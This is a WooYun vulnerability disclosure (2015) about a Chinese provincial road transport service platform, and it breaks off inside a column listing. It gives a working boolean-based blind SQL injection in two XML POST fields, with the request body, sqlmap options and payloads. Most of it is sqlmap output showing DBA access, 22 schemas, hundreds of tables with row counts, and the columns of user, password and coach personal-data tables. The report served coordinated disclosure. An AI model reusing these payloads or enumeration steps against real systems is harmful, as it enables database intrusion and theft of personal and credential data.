某省道路运输网上办事平台xml多处存在OR类型SQL注入（DBA权限+22个数据库+几百万记录+一万多教练信息）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154453

漏洞标题：某省道路运输网上办事平台xml多处存在OR类型SQL注入（DBA权限+22个数据库+几百万记录+一万多教练信息）

漏洞作者：路人甲

提交时间：2015-11-20 20:16

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-20：细节已通知厂商并且等待厂商处理中
2015-11-24：厂商已经确认，细节仅向厂商公开
2015-12-04：细节向核心白帽子及相关领域专家公开
2015-12-14：细节向普通白帽子公开
2015-12-24：细节向实习白帽子公开
2016-01-11：细节向公众公开

简要描述：

xml的碰到的不多！~~~

详细说明：

首先地址：
**.**.**.**:850/jlolmis/olallow/publicCharterList.jsp
随便填写一些数字，然后抓包

**.**.**.**:850/jlolmis/Ajax2Servlet?style=new&tier=business (POST)
<?xml version="1.0" encoding="GBK"?>
<input><head><action>fzrtmis.hztech.middle.per.AppComm,getAppList</action></head><body><XMLACTION>XML.APPPER.getPublicCharterList</XMLACTION><GETCOUNTXMLACTION>XML.APPPER.getPublicCharterListNum</GETCOUNTXMLACTION><PAGECOUNTYS>10</PAGECOUNTYS><RECUSETCOUNTYS>96349</RECUSETCOUNTYS><PAGEINDEXYS>1</PAGEINDEXYS><QRCODE>2</QRCODE><GRADE_CHARTER_MARK>1</GRADE_CHARTER_MARK><BRACOLOR>2</BRACOLOR><BRANUM>3</BRANUM></body></input>

<BRACOLOR>2</BRACOLOR>和<QRCODE>2</QRCODE>两处存在SQL注入

sqlmap添加参数测试
--threads 10 --dbms "MySQL" --level 5 --risk 3 --dbms "Oracle" --current-user --current-db --is-dba

SOAP/XML like data found in POST data. Do you want to process it? [Y/n/q] y
[01:17:53] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: (custom) POST
Parameter: XML (generic) #7*
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: <?xml version="1.0" encoding="GBK"?>
<input><head><action>fzrtmis.hztech.middle.per.AppComm,getAppList</action></head
><body><XMLACTION>XML.APPPER.getPublicCharterList</XMLACTION><GETCOUNTXMLACTION>
XML.APPPER.getPublicCharterListNum</GETCOUNTXMLACTION><PAGECOUNTYS>10</PAGECOUNT
YS><RECUSETCOUNTYS>96349</RECUSETCOUNTYS><PAGEINDEXYS>1</PAGEINDEXYS><QRCODE>-76
64' OR (4149=4149) AND 'cgaQ'='cgaQ</QRCODE><GRADE_CHARTER_MARK>1</GRADE_CHARTER
_MARK><BRACOLOR>2</BRACOLOR><BRANUM>3</BRANUM></body></input>
Place: (custom) POST
Parameter: XML (generic) #9*
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: <?xml version="1.0" encoding="GBK"?>
<input><head><action>fzrtmis.hztech.middle.per.AppComm,getAppList</action></head
><body><XMLACTION>XML.APPPER.getPublicCharterList</XMLACTION><GETCOUNTXMLACTION>
XML.APPPER.getPublicCharterListNum</GETCOUNTXMLACTION><PAGECOUNTYS>10</PAGECOUNT
YS><RECUSETCOUNTYS>96349</RECUSETCOUNTYS><PAGEINDEXYS>1</PAGEINDEXYS><QRCODE>2</
QRCODE><GRADE_CHARTER_MARK>1</GRADE_CHARTER_MARK><BRACOLOR>-1553' OR (7578=7578)
 AND 'PIqS'='PIqS</BRACOLOR><BRANUM>3</BRANUM></body></input>
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: (custom) POST, parameter: XML (generic) #7*, type: Single quoted stri
ng (default)
[1] place: (custom) POST, parameter: XML (generic) #9*, type: Single quoted stri
ng
[q] Quit
> 0
[01:17:55] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[01:17:55] [INFO] fetching current user
[01:17:55] [INFO] retrieving the length of query output
[01:17:55] [INFO] retrieved: 10
[01:18:11] [INFO] retrieved: HYT2LINEHN
current user:    'HYT2LINEHN'
[01:18:11] [INFO] fetching current database
[01:18:11] [INFO] retrieving the length of query output
[01:18:11] [INFO] resumed: 10
[01:18:11] [INFO] resumed: HYT2LINEHN
[01:18:11] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'HYT2LINEHN'
[01:18:11] [INFO] testing if current user is DBA
current user is DBA:    True
available databases [22]:
[*] CTOPV33PF
[*] CTOPV33PRD
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HYT2CREDITHN
[*] HYT2LINEHN
[*] HYT2PFHN
[*] HYT2PRDHN
[*] JXPZMISPF
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
Database: HYT2LINEHN
+-------------------------------+---------+
| Table                         | Entries |
+-------------------------------+---------+
| JL_UDE_LOG                    | 2722270 |
| DATUMCAP                      | 1703720 |
| ENBEWORRECORD                 | 1146175 |	一堆的记录信息？？？
| VECTECH                       | 1144745 |
| ENBEWORRECORD20151010         | 1143627 |
| ENBEWORRECORD20151014         | 1142507 |
| CMPSN_UPLOAD_RECORD_TMP1124   | 1135546 |
| VECTECH20151023               | 1098564 |
| ENBEWORRECORD20150109         | 1082784 |
| CMPSN                         | 1024358 |
| ENBEWORRECORD_20140909        | 1013730 |
| CMPSN_20150713                | 995924  |
| CMPSN20150701                 | 995193  |
| ENBEWORRECORD20141118         | 979075  |
| ENBEWORRECORD_20141114        | 979075  |
| ENBEWORRECORD_20141210        | 979075  |
| CMPSN_ETL                     | 979074  |
| JL_CMPSN                      | 979074  |
| JL_ENBEWORRECORD              | 979074  |
| ENBEWORRECORD20140808         | 923944  |
| ENBEWORRECORD20140707         | 919395  |
| ENBEWORRECORD20140619         | 916107  |
| ENBEWORRECORD20140620         | 916107  |
| CMPSN20141118                 | 902798  |
| CMPSN_20141114                | 902798  |
| CMPSN_20141210                | 902798  |
| ENBEWORRECORD20140618         | 902374  |
| ENBEWORRECORD20140507         | 884901  |
| ENBEWORRECORD20140520         | 884900  |
| ENBEWORRECORD20140310         | 878067  |
| CMPSN20140808                 | 872550  |
| CMPSN20140707                 | 870565  |
| CMPSN20140619                 | 869772  |
| CMPSN20140620                 | 869772  |
| CMPSN20140618                 | 867532  |
| CMPSN20140507                 | 842946  |
| ENBEWORRECORD20140221         | 826339  |
| CMPSN20140226                 | 812067  |
| TMP_JL_CMPSN_PIR              | 763782  |
| ENBEWORRECORD20131215         | 762863  |
| TMP_JL_CMPSN                  | 762834  |
| CMGRACTC                      | 753223  |
| CMPSN20131215                 | 751588  |
| CMGRACTC20150907              | 681450  |
| OBJALT                        | 663400  |
| VECTECH20150316               | 659748  |
| OBJALTDETAIL                  | 617352  |
| VECTECH_BAK20141226           | 544986  |
| STAFF_INTEGRITYASSESS         | 517894  |
| VECTECH20141118               | 479759  |
| CMVEC                         | 476250  |
| CMVEC20151023                 | 473627  |
| VECTECH_20141114              | 473310  |
| CMVEC20150910                 | 470351  |
| CMVEC_20150819                | 468785  |
| CMVEC20150728                 | 466324  |
| CMVCE20150603                 | 460934  |
| CMVEC20150529                 | 460012  |
| CMVEC20150512                 | 451051  |
| CMVEC20150427                 | 446188  |
| CMVEC20150327                 | 439460  |
| CMVEC20150316                 | 436939  |
| CMVEC_20150310                | 436094  |
| CMVEC_20150205                | 433414  |
| CMVEC_20150109                | 428650  |
| CMVEC_20150108                | 428321  |
| CMVEC_20141121                | 417133  |
| CMVEC_20141114                | 414563  |
| CMVEC20141015                 | 405317  |
| CMVEC20140812                 | 386425  |
| PERNOTION                     | 379920  |
| CMVEC20140725                 | 378734  |
| CMVEC20140707                 | 369873  |
| ENSUREBILLDETAIL              | 367240  |
| VECEXA                        | 356375  |
| PERNOTION20150722             | 330687  |
| CMCLT                         | 324508  |
| CMCLT20151023                 | 322005  |
| AUTHORIZEDPER                 | 319962  |
| CMCLT20150915                 | 318986  |
| CMCLT20150910                 | 318552  |
| CMCLT20150728                 | 315032  |
| CMCLT20150625                 | 312205  |
| CMCLT20150603                 | 310169  |
| ABC                           | 307717  |
| PERNOTION20150603             | 301606  |
| CMCLT20150327                 | 301211  |
| CMCLT20150316                 | 298673  |
| CMCLT_BAK20150205             | 295497  |
| ENBEWORRECORD_TMP20141124     | 295425  |
| CMCLT_20150109                | 291196  |
| CMCLT_20141114                | 283510  |
| CMPSN_TMP20141124             | 279629  |
| VECTECH20140813               | 277625  |
| CMCLT20141015                 | 277287  |
| CMCLT20140707                 | 254467  |
| A1                            | 237450  |
| ACMVEC                        | 221445  |
| BINOBJ                        | 218177  |
| CMPSN_TMP20150701             | 201270  |
| PERNOTION_20141119            | 194850  |
| VECEXA20150316                | 168890  |
| ENSUREBILL                    | 129812  |
| ENSUREBILL20151023            | 125215  |
| ENSUREBILL20150728            | 108758  |
| CHARTERAPPLY                  | 99667   |
| CALC_REPORT_RESULT            | 98333   |
| PAYBILLPRINT                  | 98241   |
| ENBEWORRECORD_TMP20150103     | 98172   |
| CHARTERAPPLY20151027          | 97768   |
| PAYBILL                       | 97685   |
| CMPSN_TMP20150103             | 95604   |
| PRINTRECORD                   | 95495   |
| PAYBILL20151023               | 92193   |
| RYXH                          | 91162   |
| T_DZS_BILLSTOCK               | 82738   |
| RYXH_20141114                 | 80381   |
| T_DZS_BILLSTOCK20151023       | 79642   |
| CMPSN_ETL11                   | 78358   |
| ENSUREBILL20150316            | 77279   |
| T_PF_LOG                      | 75043   |
| PAYBILL20150728               | 74630   |
| ENSUREBILL_BAK20150206        | 73932   |
| ENSUREBILL20150129            | 73920   |
| TEMP111                       | 73364   |
| APPTAXISERVICEPER             | 70071   |
| APPTAXISERVICEPER20151023     | 69551   |
| ODBC_IMPORT                   | 66689   |
| APPCLTPER                     | 66619   |
| CMVEC_INFO                    | 62393   |
| T_DZS_JTJJPJ                  | 60448   |
| T_DZS_JTJJPJ20151023          | 60163   |
| T_DZS_JTJJPJ20150803          | 59182   |
| T_DZS_JTJJPJ20150728          | 58550   |
| T_DZS_PAYBILLPRINT            | 56449   |
| RYXH20131031                  | 53727   |
| APPCLTPER20150603             | 52487   |
| APPTAXISERVICEPER_20150206    | 50360   |
| TMP_SRCFILE                   | 50091   |
| APPTAXISERVICEPER_20150109    | 48088   |
| ENBEWORRECORD2014080807       | 45956   |
| T_DZS_JTJJPJ_20141104         | 44639   |
| T_DZS_JTJJPJ20140819          | 44057   |
| T_DZS_JTJJPJ20140818          | 44056   |
| PAYBILL20150316               | 42947   |
| CMVECMEMBTRAN                 | 42690   |
| APPTAXISERVICEPER_20141114    | 41754   |
| LINE_SECTIONS                 | 40671   |
| APPCLTPER_20150109            | 38235   |
| FUELCHECK                     | 36403   |
| LINECARDHISTORY               | 35439   |
| APPCLTPER_20141114            | 32947   |
| TMP_BINOBJ                    | 32273   |
| ENSUREBILL20141031            | 27521   |
| STAFF_DOCUMENTS               | 24229   |
| AAAAAWH20150331               | 23842   |
| ENBEWORRECORD20140508         | 21530   |
| EMPLOYRECORD                  | 18841   |
| T_PF_PERMREL                  | 18342   |
| EXTENDEDUNLOCK                | 18088   |
| CMPSN_UPLOAD_RECORD           | 17605   |
| JLCMPSN                       | 17185   |
| LINCARD                       | 16349   |
| STAFF_TRAINTEST               | 16341   |
| LINCARD20150910               | 16287   |
| LINCARD20151023               | 16275   |
| LINCARD20150818               | 16223   |
| LINCARD20150728               | 16145   |
| LINCARD20150519               | 16093   |
| TERBUSCLT                     | 16072   |
| LINCARD20150327               | 15872   |
| BUSSTATION                    | 15861   |
| LINCARD20150316               | 15806   |
| LINCARD_20150109              | 15423   |
| TERBUSVEC                     | 14880   |
| LINCARD_20141114              | 14417   |
| COACH                         | 14092   |
| A1A2                          | 13387   |
| AAAB                          | 13161   |
| CMVEC_TICKET                  | 12501   |
| BCBILLSTOCK                   | 11635   |
| PAYNORM                       | 11570   |
| T_DZS_PJINFOPRINT             | 11401   |
| ABVD                          | 11206   |
| AZ                            | 11206   |
| CASDETOBJLIST                 | 11134   |
| AAA1                          | 11071   |
| LCH                           | 10873   |
| LINPERREG                     | 10719   |
| LINPERREG20151023             | 10688   |
| LINPERREG20150818             | 10576   |
| LINPERREG20150519             | 10391   |
| TMP_CMPSNID_ROWID             | 10351   |
| T_DZS_PJDETAIL                | 10238   |
| APPLINPER                     | 10229   |
| LINPERREG20150316             | 10221   |
| APPLINPER20151023             | 10192   |
| T_DZS_PJINFO                  | 10135   |
| EQUIPMENT                     | 10099   |
| APPLINPER20150818             | 10072   |
| TAXISERVICECARD               | 10052   |
| CMPSNREGISTER                 | 9991    |
| APPLINPER20150519             | 9886    |
| LINPERREG_20150109            | 9878    |
| APPLINPER20150316             | 9719    |
| A                             | 9549    |
| APPLINPER_20150109            | 9475    |
| LINPERREG_20141114            | 9329    |
| STAFF_EDUCATION               | 9040    |
| APPLINPER_20141114            | 8938    |
| OPERATEWARRANTOFTAXI          | 8556    |
| CASDIRECTORY                  | 8352    |
| LINPERREG20140728             | 8168    |
| LINE                          | 8148    |
| LINE20151023                  | 8128    |
| LINE20150910                  | 8103    |
| LINE20150818                  | 8093    |
| LINE20150728                  | 8069    |
| LINE20150519                  | 7980    |
| LINE20150327                  | 7898    |
| LINE20150316                  | 7879    |
| LINE_20150109                 | 7725    |
| RETURNRECEIPT                 | 7577    |
| SURVEYMLIST                   | 7571    |
| LINE_20141114                 | 7502    |
| LINCARD20131024               | 7323    |
| LINE20140728                  | 7197    |
| LINE20140716                  | 7166    |
| LINE20140710                  | 7129    |
| LINE20140627                  | 7093    |
| LINE20140526                  | 7002    |
| LINE140509                    | 6964    |
| LINE20140508                  | 6964    |
| LINE20140509                  | 6964    |
| BUSLINECARD                   | 6695    |
| AAAAA                         | 6597    |
| CLTEQUIPMENT                  | 6213    |
| REPORT_DETAIL_CONFIG          | 6050    |
| VILTOWCANCODE                 | 5947    |
| T_DZS_BILLSTOCK_20140605      | 5760    |
| STATIONNAME                   | 5747    |
| REPORTRESULTDETAIL            | 5579    |
| VILTOWCANCODE_BAK             | 5553    |
| LINPERPROVE                   | 5462    |
| EXAMAPR                       | 5414    |
| APPCLTEQUIPMENT               | 5301    |
| CASCAULIST                    | 4926    |
| PERNOTION1                    | 4903    |
| LINPERREG20131024             | 4501    |
| BCBILL                        | 4476    |
| APPLINPER20131024             | 4455    |
| LINPERREG20131028             | 4356    |
| APPLINPER20131028             | 4310    |
| CASEINFO                      | 4109    |
| COUCANCODE                    | 3870    |
| COUCANCODE20141204            | 3864    |
| COUCANCODE_BAK                | 3859    |
| PUNDECIDE                     | 3822    |
| ENBEWORRECORDTEST             | 3798    |
| AA                            | 3781    |
| CMPSNTEST                     | 3762    |
| STAFF_LLLEGALSCORING          | 3745    |
| CMVECSTOPREC                  | 3664    |
| T_CASETEMPLATEDETAIL          | 3656    |
| AAE                           | 3619    |
| CASENOTICE                    | 3597    |
| SURVEYREP                     | 3478    |
| AAC                           | 3457    |
| ENDCASREPORT                  | 3331    |
| SCENEREC                      | 3277    |
| INQUERYREC                    | 3266    |
| T_PF_METADATA                 | 2905    |
| ABABA                         | 2797    |
| CMVEC_TWO_LEVEL_MAINTENANCE   | 2776    |
| CASESTATEMENT                 | 2716    |
| T_DZS_TAXESDETAILS            | 2615    |
| REPORT_CONTENT                | 2506    |
| RELATIONSHIPOFLINEWITHVEHICLE | 2393    |
| WAYBILL                       | 2357    |
| CLTFACILITIES                 | 2317    |
| ENSUREBILLDETAIL20140528      | 2280    |
| ROAD                          | 2141    |
| CASEDISCUSSION                | 2127    |
| APPCLTFACILITIES              | 2119    |
| CMVECPERDETAIL                | 2105    |
| CHKPARAMHISTORY               | 1848    |
| LCH_TEMP                      | 1759    |
| LINE_SECTIONS20140526         | 1604    |
| CASEINFO20150327              | 1583    |
| CASESTATEMENTRESPONSE         | 1483    |
| VECWORTHLESS                  | 1419    |
| CASEINFO20150316              | 1368    |
| AAQ                           | 1354    |
| PLANVECDETAIL                 | 1223    |
| BUSLINE                       | 1216    |
| VEHICLE_DEL                   | 1187    |
| TMP_CC_CMVEC                  | 1141    |
| INSPECTREC                    | 1120    |
| LECITEM                       | 1103    |
| APPBUSLINEPER                 | 1097    |
| EQUIPMENTCONFIG               | 1040    |
| CALC_CONFIG_FIELD             | 1024    |
| ENSURESTOPREC                 | 1009    |
| BUSLINEREG                    | 966     |
| CHKPARAM                      | 966     |
| CASEINFO_20150109             | 930     |
| TAXISERVICECARDLOCK           | 896     |
| PAYBILLPRINT20140528          | 859     |
| TAXISERVICECARD_20140929      | 839     |
| REPORT_ROW_CONFIG             | 823     |
| VECCONTRACTORRECORD           | 821     |
| BCBILLWODETAIL                | 811     |
| DENOTER                       | 790     |
| AAW                           | 772     |
| TERBUSLIN                     | 758     |
| ENSUREBILL0509                | 739     |
| BUSLINE_20141114              | 736     |
| ENBEWORRECORD_TMP20141124DEL  | 716     |
| WORKSPS                       | 690     |
| T_CASETEMPLATEDETAIL20141111  | 689     |
| APPBUSLINEPER_20141114        | 682     |
| PERIODCONFIG                  | 674     |
| CLTSTAFF                      | 655     |
| APPSTATION                    | 642     |
| TAXIUPDATECMVECINFO           | 641     |
| LAWITEM                       | 632     |
| TAXIUPDATECMVEC               | 629     |
| APPCMVEC                      | 628     |
| OPERATEWARRANTOFTAXILOCK      | 543     |
| BCBILLWO                      | 540     |
| RATEPAYLERNUM                 | 515     |
| AAB                           | 504     |
| ASD                           | 496     |
| ASDF                          | 496     |
| AAAAB                         | 481     |
| CMVEC_TMP20150612             | 481     |
| TRANSFEROWNERSHIPHISTORY      | 444     |
| CASEBASELAWITEM               | 430     |
| EQUTEMDETAIL                  | 430     |
| OPERATEWARRANTOFTAXI20140512  | 399     |
| CMCLTPEPOLE                   | 395     |
| APPENSUREBILL                 | 392     |
| ODBC_LINPER                   | 379     |
| T_DZS_FZ                      | 375     |
| RECORDLOG                     | 374     |
| PRESTIGEREPORT                | 369     |
| LINEWORK                      | 366     |
| T_DZS_SHIPPROJECT             | 353     |
| APPENSUREBILLDETAIL           | 346     |
| APPCMVEC_20150109             | 337     |
| CASEINFO_DETAIN               | 335     |
| REPORT_COLUMN_CONFIG          | 335     |
| ENSUREBILLUPP                 | 323     |
| APPBUSLINEPER20131107         | 320     |
| BAKDETAIL                     | 320     |
| ENTITY_DATUM                  | 314     |
| T_CASETEMPLATE                | 307     |
| APPCMVEC_20141114             | 292     |
| CASEINFO_JYLC                 | 286     |
| AABAA                         | 281     |
| DATUMLIST                     | 278     |
| COACHSITE                     | 273     |
| CASEINFOBUCKLE                | 269     |
| AAYH                          | 267     |
| T_DZS_PREPAY                  | 259     |
| CMVECTEMPNOCONFIGURE          | 253     |
| DATUMLIST20140408             | 245     |
| EQUIPMENTBASE                 | 245     |
| QZRELIEVE                     | 244     |
| AAA                           | 240     |
| WS_INTERFACE_CONFIG_DETAIL    | 230     |
| ENTITY_DATUM20140408          | 226     |
| SCOOFBUSINESS                 | 225     |
| WS_INTERFACE_CONFIG_RESULT    | 207     |
| T_PF_USER                     | 201     |
| TMP_OBJ111                    | 199     |
| PEPOLECARD                    | 195     |
| T_DZS_CATETAXES               | 195     |
| T_PF_USERROLE                 | 188     |
| SCOOFBUSINESSBAK              | 178     |
| JL_BTSJ_LOG                   | 173     |
| T_PF_DEP                      | 169     |
| T_PF_ROLE                     | 166     |
| T_DM_KY_CL_JYFW               | 164     |
| APPCLTSTAFF                   | 159     |
| EQUIPMENTINFO                 | 157     |
| T_PF_DEP_20141225             | 157     |
| FACILITIESBASE                | 154     |
| DRIVLICENSE                   | 137     |
| LWX                           | 129     |
| CASEBASE                      | 128     |
| T_BUSOP                       | 127     |
| CASESTATE                     | 114     |
| LCH_CLLX                      | 110     |
| QRY_REPORTTMPINFO             | 96      |
| QRY_REPORTTMPINFO20131204     | 96      |
| CASEINFO_JYLC20150327         | 93      |
| T_PARAMCODE                   | 92      |
| BENCHMARK                     | 89      |
| CMCLTSTOPRES                  | 75      |
| EMPLOYMESSAGE                 | 74      |
| BASIC_PARAMETER               | 67      |
| CASEINFO_JYLC20150316         | 66      |
| T_PF_DEP2                     | 66      |
| BANKS                         | 65      |
| T_CASE_FIELDS                 | 64      |
| T_DZS_CMVECSTOPREC            | 64      |
| T_DZS_VATSTANDARD             | 63      |
| T_DZS_JBXXPZ                  | 62      |
| T_DZS_BILL                    | 61      |
| COMMFLOWPROCESS               | 54      |
| T_DM_RY_LB_CYLB               | 51      |
| COACHCARPER                   | 49      |
| EQUTEMPLATE                   | 47      |
| T_CASETEMPLATE_20141111       | 44      |
| TESTITEMS                     | 43      |
| PAYBILL20140513               | 40      |
| TMP_CC_CMCLT                  | 38      |
| REPORT_CONFIG                 | 35      |
| EQUIPSTANDARD                 | 34      |
| FACTEMPLATE                   | 34      |
| FORMINPUT                     | 34      |
| CALC_CONFIG_TABLE             | 32      |
| ONLINEUSER                    | 31      |
| WSWCMCLT                      | 31      |
| T_DM_KY_CL_LXDJ               | 28      |
| CHECKTARGET                   | 27      |
| TARGETCLASS                   | 26      |
| TAXAPPLOCK_MID                | 24      |
| BUSLINECARDSTOP               | 23      |
| INF_UDBC                      | 22      |
| LAW                           | 22      |
| BAK_STATIONNAME_0529          | 20      |
| PASSANNUAL                    | 20      |
| T_DZS_HYGGLX                  | 20      |
| REGIONAL                      | 19      |
| TMP_CMVEC_HUALONGMOVE_030719  | 19      |
| BS_RESULT                     | 18      |
| CASEHEARING                   | 17      |
| INTLCMPSN                     | 17      |
| BCBILLLOST                    | 16      |
| LETTERS                       | 16      |
| TAXAPPLOCK                    | 16      |
| BAK_LINE_230529               | 15      |
| BAK_LINPERREG_0530            | 15      |
| WSCMCLT                       | 14      |
| OLAPPCLTPER                   | 13      |
| QRY_REPORTINFO                | 13      |
| INTLCMCLT                     | 12      |
| TMP_CMVEC_HENYUGMOVE_030719   | 12      |
| WS_INTERFACE_CONFIG_MAIN      | 12      |
| APPROVALOPINIONS              | 11      |
| BAK_APPLINPER_230529          | 11      |
| LETTERSDETAIL                 | 11      |
| WSFLDVALUEMAPPER              | 11      |
| APPRECORD                     | 10      |
| INTLCMVEC                     | 10      |
| PAYFEESTATION                 | 10      |
| REPORTRESULTMAIN              | 10      |
| APPLYTYPE_CONFIG              | 9       |
| CMPSN_DEL20150701             | 9       |
| STALEVCHECK                   | 8       |
| LECERTIFICATE                 | 7       |
| NOPUNDECIDE                   | 7       |
| T_DZS_JTJJPJ_BAK20140812      | 7       |
| BAK_APPLINPER_230530          | 6       |
| COMPLAINTCASE                 | 6       |
| ITEMBUILD                     | 6       |
| PASSSTOPCARD                  | 6       |
| STATIONPSNS                   | 6       |
| TARGETTYPE                    | 6       |
| CHARTERDEPRULE                | 5       |
| T_PF_RESULT                   | 5       |
| BCBILLPLAN                    | 4       |
| BCBILLPLANDETAIL              | 4       |
| PROREGLIST                    | 4       |
| REPAIRCMCLTS                  | 4       |
| T_DZS_JTJJ                    | 4       |
| T_DZS_YGJGGL                  | 4       |
| APPROVE                       | 3       |
| INF_CMPSNS_KS_PH              | 3       |
| OLAPPLINPER                   | 3       |
| PSNCTCDETOBJ                  | 3       |
| REPAIRCMCLT                   | 3       |
| SERVICECARD                   | 3       |
| SPOTCHECK                     | 3       |
| STAGEEXTENSIONAPP             | 3       |
| T_DZS_STARTLEVYSEAT           | 3       |
| T_OA_NOTICE                   | 3       |
| TAXAPPUNLOCK                  | 3       |
| CMPSNCHANGES                  | 2       |
| DRIVERCREDIT                  | 2       |
| POLUNION                      | 2       |
| SECURITYINSPECT               | 2       |
| T_DZS_DEZSJFFS                | 2       |
| TAXBUSREATER                  | 2       |
| CASEINFO_DLX                  | 1       |
| CMCLT_1                       | 1       |
| CMCLTCHANGEHISTORY            | 1       |
| CMPSNTEST2                    | 1       |
| CMVEC_DETECTION               | 1       |
| DERAPPLY                      | 1       |
| DRAWCERTIFICATE               | 1       |
| ENBEWORRECORDJL               | 1       |
| PROGOODSLIST                  | 1       |
| SECURITYPSN                   | 1       |
| SECURITYREFORM                | 1       |
| STAFF_BLACKLIST               | 1       |
| STAFF_SAFETYPRODUCTION        | 1       |
| STAFF_SCOREEDU                | 1       |
| STAFF_SKILLSIDENTIFICATION    | 1       |
| T_PF_FAV                      | 1       |
+-------------------------------+---------+
Database: HYT2LINEHN
Table: T_PF_USER
[10 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| DEPID       | VARCHAR2 |
| HZCUSTID    | VARCHAR2 |
| IDENTIFY    | VARCHAR2 |
| LOGINNAME   | VARCHAR2 |
| PASSWRD     | VARCHAR2 |
| PFCMZ       | VARCHAR2 |
| SYSOPERTIME | NUMBER   |
| USERCODE    | VARCHAR2 |
| USERNAME    | VARCHAR2 |
| USERSTATE   | VARCHAR2 |
+-------------+----------+
Database: HYT2LINEHN
Table: ONLINEUSER
[9 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| CLITNAME  | VARCHAR2 |
| CTCNO     | VARCHAR2 |
| JURPERSON | VARCHAR2 |
| PASSWORD  | VARCHAR2 |
| STATUS    | NUMBER   |
| TELEPHONE | VARCHAR2 |
| USERCODE  | VARCHAR2 |
| USERDEP   | VARCHAR2 |
| USERID    | VARCHAR2 |
+-----------+----------+
Database: HYT2LINEHN
Table: JL_UDE_LOG
[6 columns]
+----------+----------+
| Column   | Type     |
+----------+----------+
| APPID    | VARCHAR2 |
| CONTTYPE | VARCHAR2 |
| CREDATE  | CHAR     |
| CRETIME  | CHAR     |
| LOGID    | VARCHAR2 |
| RSSTATUS | VARCHAR2 |
+----------+----------+
Database: HYT2LINEHN
Table: EMPLOYRECORD
[19 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| CMPSNID         | VARCHAR2 |
| CMPSNREGISTERID | VARCHAR2 |
| CREDATE         | CHAR     |
| CRETIME         | CHAR     |
| CREUSRCODE      | VARCHAR2 |
| EDIDATE         | CHAR     |
| EDITIME         | CHAR     |
| EDIUSRCODE      | VARCHAR2 |
| EMPLOYRECORDID  | VARCHAR2 |
| ISEFFECT        | NUMBER   |
| MARKDOC         | VARCHAR2 |
| NAME            | VARCHAR2 |
| NOWCLITNAME     | VARCHAR2 |
| NOWCMCLTID      | VARCHAR2 |
| OLDCLITNAME     | VARCHAR2 |
| OLDCMCLTID      | VARCHAR2 |
| RECORDTYPE      | CHAR     |
| SRCID           | VARCHAR2 |
| SYSOPERTIME     | NUMBER   |
+-----------------+----------+
Database: HYT2LINEHN
Table: STAFF_TRAINTEST
[12 columns]
+------------------+----------+
| Column           | Type     |
+------------------+----------+
| CARDNO           | VARCHAR2 |
| CARDTYPE         | VARCHAR2 |
| EXAMDATE         | CHAR     |
| EXAMRESULT       | VARCHAR2 |
| EXAMSUBID        | VARCHAR2 |
| EXAMSUBNAME      | VARCHAR2 |
| INVIGILATOR      | VARCHAR2 |
| NAME             | VARCHAR2 |
| STAFFID          | VARCHAR2 |
| SYSOPERTIME      | NUMBER   |
| TICKETNUMBER     | VARCHAR2 |
| TRAININSTITUTION | VARCHAR2 |
+------------------+----------+
Database: HYT2LINEHN
Table: COACH
[58 columns]
+----------------+----------+
| Column         | Type     |
+----------------+----------+
| AGE            | VARCHAR2 |
| BEWORLEVEL     | VARCHAR2 |
| BEWORSCOPE     | VARCHAR2 |
| BIRTHDAY       | CHAR     |
| CARDNO         | VARCHAR2 |
| CARDTYPE       | VARCHAR2 |
| CLITNAME       | VARCHAR2 |
| CMCLTID        | VARCHAR2 |
| COACHID        | VARCHAR2 |
| CREDATE        | CHAR     |
| CRETIME        | CHAR     |
| CREUSRCODE     | VARCHAR2 |
| DANGRESULTS    | VARCHAR2 |
| DANGRYTEAEXP   | VARCHAR2 |
| DANGRYTOTAL    | VARCHAR2 |
| DANGTOATL      | VARCHAR2 |
| DEPCODE        | VARCHAR2 |
| DOCNO          | VARCHAR2 |
| DRICARDNO      | VARCHAR2 |
| DRISTADATE     | CHAR     |
| EDIDATE        | CHAR     |
| EDITIME        | CHAR     |
| EDIUSRCODE     | VARCHAR2 |
| EDUCATION      | VARCHAR2 |
| ENDDATE        | CHAR     |
| EXAMINEEAREA   | VARCHAR2 |
| GRADATE        | CHAR     |
| ISEFFECT       | NUMBER   |
| LICSTATUS      | VARCHAR2 |
| MENTRESULT     | VARCHAR2 |
| NAME           | VARCHAR2 |
| OPERTEAEXP     | VARCHAR2 |
| OPERTRESULTS   | VARCHAR2 |
| OPERWRITPLAN   | VARCHAR2 |
| OPETOTAL       | VARCHAR2 |
| ORG            | VARCHAR2 |
| PASSRESULTS    | VARCHAR2 |
| PASSRYTEAEXP   | VARCHAR2 |
| PASSRYTOTAL    | VARCHAR2 |
| PASSTOTAL      | VARCHAR2 |
| PERCOAVECTYPE  | VARCHAR2 |
| PERDRITYPE     | VARCHAR2 |
| PERIOD         | VARCHAR2 |
| PHONE          | VARCHAR2 |
| REMARKDOC      | VARCHAR2 |
| SEX            | CHAR     |
| STARTDATE      | CHAR     |
| STNUMBER       | VARCHAR2 |
| SYSOPERTIME    | NUMBER   |
| TECCLASS       | VARCHAR2 |
| THEORESULTS    | VARCHAR2 |
| THEORYTEAEXP   | VARCHAR2 |
| THEORYWRITPLAN | VARCHAR2 |
| THEOTOTAL      | VARCHAR2 |
| TITNO          | VARCHAR2 |
| TRANSFERDOC    | VARCHAR2 |
